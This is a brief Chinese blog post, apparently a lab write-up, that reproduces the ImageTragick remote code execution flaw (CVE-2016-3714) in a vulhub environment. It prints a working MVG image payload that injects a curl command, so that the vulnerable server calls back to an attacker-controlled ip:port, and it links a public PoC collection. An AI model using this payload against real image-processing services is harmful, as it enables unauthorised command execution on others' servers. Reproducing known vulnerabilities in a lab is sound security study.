标签:没事 poc get ext port view nbsp mamicode ash
CVE-2016–3714:
闲着没事突然想起这个洞来,借用vulhub复现一下
poc有很多:https://github.com/ImageTragick/PoCs
我用的
push graphic-context
viewbox 0 0 640 480
fill ‘url(https://127.0.0.1/oops.jpg"|curl "ip:port/image)‘
pop graphic-context
图片上传后,vps查看日志
Imagetragick RCE(CVE-2016–3714)复现
标签:没事 poc get ext port view nbsp mamicode ash
原文地址:https://www.cnblogs.com/jinqi520/p/11814031.html